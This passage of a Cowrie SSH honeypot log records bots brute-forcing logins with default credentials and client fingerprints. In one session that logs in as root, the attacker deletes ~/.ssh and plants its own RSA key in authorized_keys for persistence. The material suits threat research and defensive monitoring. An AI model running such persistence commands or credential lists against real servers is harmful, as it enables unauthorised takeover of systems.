sh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:04:33.008549Z","src_ip":"203.106.164.74","session":"1b76b462fb28"}
{"eventid":"cowrie.login.failed","username":"user","password":"admin123","message":"login attempt [user/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:04:33.328477Z","src_ip":"134.199.174.250","session":"5e005bf03638"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:04:33.850428Z","src_ip":"203.106.164.74","session":"1b76b462fb28"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:34.620499Z","src_ip":"134.199.174.250","session":"5e005bf03638"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:35.052784Z","src_ip":"203.106.164.74","session":"1b76b462fb28"}
{"eventid":"cowrie.session.connect","src_ip":"203.106.164.74","src_port":50000,"dst_ip":"1.2.3.4","dst_port":22,"session":"1282a9ce3db2","protocol":"ssh","message":"New connection: 203.106.164.74:50000 (1.2.3.4:22) [session: 1282a9ce3db2]","sensor":"my-vps","timestamp":"2025-09-08T13:04:35.253238Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:04:35.254686Z","src_ip":"203.106.164.74","session":"1282a9ce3db2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:04:35.457021Z","src_ip":"203.106.164.74","session":"1282a9ce3db2"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":50400,"dst_ip":"1.2.3.4","dst_port":22,"session":"33786f6b3ce0","protocol":"ssh","message":"New connection: 139.59.14.27:50400 (1.2.3.4:22) [session: 33786f6b3ce0]","sensor":"my-vps","timestamp":"2025-09-08T13:04:36.294794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:04:36.295482Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:04:36.303119Z","src_ip":"203.106.164.74","session":"1282a9ce3db2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:36.505790Z","src_ip":"203.106.164.74","session":"1282a9ce3db2"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:36.508648Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:04:36.617783Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei@2025","message":"login attempt [root/Huawei@2025] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:04:37.943156Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:04:38.592949Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:04:38.593818Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:04:38.595122Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:38.912638Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:04:39.651552Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:04:39.652160Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:04:39.980129Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:39.981084Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":50414,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaad8efb2156","protocol":"ssh","message":"New connection: 139.59.14.27:50414 (1.2.3.4:22) [session: aaad8efb2156]","sensor":"my-vps","timestamp":"2025-09-08T13:04:40.342973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:04:40.343882Z","src_ip":"139.59.14.27","session":"aaad8efb2156"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:04:40.684020Z","src_ip":"139.59.14.27","session":"aaad8efb2156"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:04:42.100739Z","src_ip":"139.59.14.27","session":"aaad8efb2156"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:43.443553Z","src_ip":"139.59.14.27","session":"aaad8efb2156"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":39122,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6f85fe61eed","protocol":"ssh","message":"New connection: 139.59.14.27:39122 (1.2.3.4:22) [session: d6f85fe61eed]","sensor":"my-vps","timestamp":"2025-09-08T13:04:43.742147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:04:43.743201Z","src_ip":"139.59.14.27","session":"d6f85fe61eed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:04:44.065678Z","src_ip":"139.59.14.27","session":"d6f85fe61eed"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:04:45.355206Z","src_ip":"139.59.14.27","session":"d6f85fe61eed"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:45.684795Z","src_ip":"139.59.14.27","session":"d6f85fe61eed"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:45.686729Z","src_ip":"139.59.14.27","session":"33786f6b3ce0"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":53286,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f55e23b6351","protocol":"ssh","message":"New connection: 134.199.174.250:53286 (1.2.3.4:22) [session: 9f55e23b6351]","sensor":"my-vps","timestamp":"2025-09-08T13:05:04.358024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:05:04.358988Z","src_ip":"134.199.174.250","session":"9f55e23b6351"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:05:04.701061Z","src_ip":"134.199.174.250","session":"9f55e23b6351"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:05:05.622460Z","src_ip":"134.199.174.250","session":"9f55e23b6351"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:05:07.071179Z","src_ip":"134.199.174.250","session":"9f55e23b6351"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41980,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cd7cfb4396c","protocol":"ssh","message":"New connection: 212.227.235.229:41980 (1.2.3.4:22) [session: 9cd7cfb4396c]","sensor":"my-vps","timestamp":"2025-09-08T13:05:11.802692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:05:11.803333Z","src_ip":"212.227.235.229","session":"9cd7cfb4396c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:05:11.935330Z","src_ip":"212.227.235.229","session":"9cd7cfb4396c"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia.123","message":"login attempt [nvidia/nvidia.123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:05:12.505819Z","src_ip":"212.227.235.229","session":"9cd7cfb4396c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:05:13.639798Z","src_ip":"212.227.235.229","session":"9cd7cfb4396c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40054,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce27f536b005","protocol":"ssh","message":"New connection: 212.227.235.229:40054 (1.2.3.4:22) [session: ce27f536b005]","sensor":"my-vps","timestamp":"2025-09-08T13:05:31.809191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:05:31.810243Z","src_ip":"212.227.235.229","session":"ce27f536b005"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:05:31.982042Z","src_ip":"212.227.235.229","session":"ce27f536b005"}
{"eventid":"cowrie.login.failed","username":"lenovo","password":"lenovo","message":"login attempt [lenovo/lenovo] failed","sensor":"my-vps","timestamp":"2025-09-08T13:05:32.703895Z","src_ip":"212.227.235.229","session":"ce27f536b005"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:05:33.876864Z","src_ip":"212.227.235.229","session":"ce27f536b005"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":42362,"dst_ip":"1.2.3.4","dst_port":22,"session":"26779f75d2e8","protocol":"ssh","message":"New connection: 134.199.174.250:42362 (1.2.3.4:22) [session: 26779f75d2e8]","sensor":"my-vps","timestamp":"2025-09-08T13:05:34.859285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:05:34.859926Z","src_ip":"134.199.174.250","session":"26779f75d2e8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:05:35.151877Z","src_ip":"134.199.174.250","session":"26779f75d2e8"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:05:36.074734Z","src_ip":"134.199.174.250","session":"26779f75d2e8"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:05:37.371906Z","src_ip":"134.199.174.250","session":"26779f75d2e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39708,"dst_ip":"1.2.3.4","dst_port":22,"session":"e82803c644f4","protocol":"ssh","message":"New connection: 212.227.235.229:39708 (1.2.3.4:22) [session: e82803c644f4]","sensor":"my-vps","timestamp":"2025-09-08T13:05:42.533340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:05:42.534287Z","src_ip":"212.227.235.229","session":"e82803c644f4"}
